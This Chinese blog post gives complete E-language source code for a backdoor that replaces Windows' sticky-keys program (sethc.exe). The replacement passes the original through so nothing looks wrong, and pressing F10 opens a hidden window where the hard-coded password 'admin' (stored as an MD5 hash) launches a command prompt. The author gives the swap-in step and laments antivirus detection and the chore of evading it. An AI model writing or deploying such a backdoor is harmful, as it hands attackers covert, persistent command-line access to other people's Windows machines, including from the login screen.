Rover12421's Blog

The End.

易语言写的sethc后门

      用易语言写确实很简单,但由于现在杀软对易语言编译的程序误报很严重,所以只做参考吧,现在易官方也正准备赶紧更新已解决这些问题,很期待。

      本后门功能:
使用了原本的sethc作为资源加载
释放为setch.exe
等待setch.exe完成原本的sethc任务之后,按f10键弹出Setch CMD。
Setch CMD作用只有一个,输入密码,运行cmd
直接运行和原sethc文件一样没任何效果
在命令行下带参数运行,除了200-300的这段参数会等待原效果结束再运行Setch CMD外(F10呼出),其他任何参数和直接运行在原文件上是一样的。
密码使用MD5加密

image

F10呼出的就是这样的了,在输入框输入密码点"Start CMD"就会运行CMD了。注意,这个窗口要设置默认是隐藏的(不显示)。

image

这是加载的原sethc文件,我这用的是我本机的英文sethc。大家可以用自己机器上的中文sethc。

image 
image

源码就这么点,我贴下吧。


.版本 2
.支持库 shellEx
.支持库 dp1

.程序集 窗口程序集1

.子程序 __启动窗口_创建完毕
.局部变量 命令行, 文本型, , “0”
.局部变量 参数, 文本型

取命令行 (命令行)
.如果真 (取数组成员数 (命令行) ≠ 1)
    结束 ()
.如果真结束
写到文件 (“setch.exe”, #sethc_En)
.如果 (“200” ≤ 命令行 [1] 且 命令行 [1] ≤ “300”)
    运行 (“setch.exe” + “ ” + 命令行 [1], 真, )
    删除文件 (“setch.exe”)
.否则
    运行 (“setch.exe” + “ ” + 命令行 [1], 真, )
    删除文件 (“setch.exe”)
    结束 ()

.如果结束
注册热键 (_启动窗口.取窗口句柄 (), 标签1.取窗口句柄 (), 0, #F10键)
编辑框1.内容 = “Password”

.子程序 _标签1_反馈事件, 整数型
.参数 参数一, 整数型
.参数 参数二, 整数型

.如果 (启动窗口.可视)
   
启动窗口.可视 = 假
.否则
    _启动窗口.可视 = 真
.如果结束

.子程序 _按钮1_被单击

.如果真 (取数据摘要 (到字节集 (编辑框1.内容)) = “21232f297a57a5a743894a0e4a801fc3”)
    运行 (“cmd.exe”, 假, )
.如果真结束


密码用的是MD5加密,21232f297a57a5a743894a0e4a801fc3这是admin的MD5密文。

很简单的,独立编译就OK了,替换原系统的sethc测试吧。

等易解决了误报问题,那就很好了。现在写的还的做免杀也真是麻烦。

Comments